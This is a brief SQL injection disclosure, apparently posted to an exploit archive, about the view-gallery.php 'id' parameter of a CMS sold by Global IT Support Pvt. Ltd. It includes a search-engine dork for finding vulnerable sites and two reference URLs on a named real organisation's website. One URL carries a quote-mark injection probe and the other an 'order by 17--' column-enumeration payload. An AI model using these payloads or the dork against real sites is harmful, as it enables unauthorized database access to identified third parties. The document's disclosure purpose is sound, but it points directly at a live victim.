Dear Admin,
I am " Mehdi Razmjoo " from Iran. I discovered SQL injection vulnerability in Global IT Support Pvt. Ltd CMS.
Summary:
SQL injection vulnerability in /view-gallery.php?id=[SQLi]' in component in Global IT Support Pvt. Ltd CMS allows a remote attacker to execute arbitrary SQL commands.
Dork: inurl :/view-gallery.php?id=[SQLi] '
Remote: YES
References:
http://www.bpwnepal.org.np/gallery.php?id=8'
http://www.bpwnepal.org.np/gallery.php?id=8/**/order/**/by/**/17--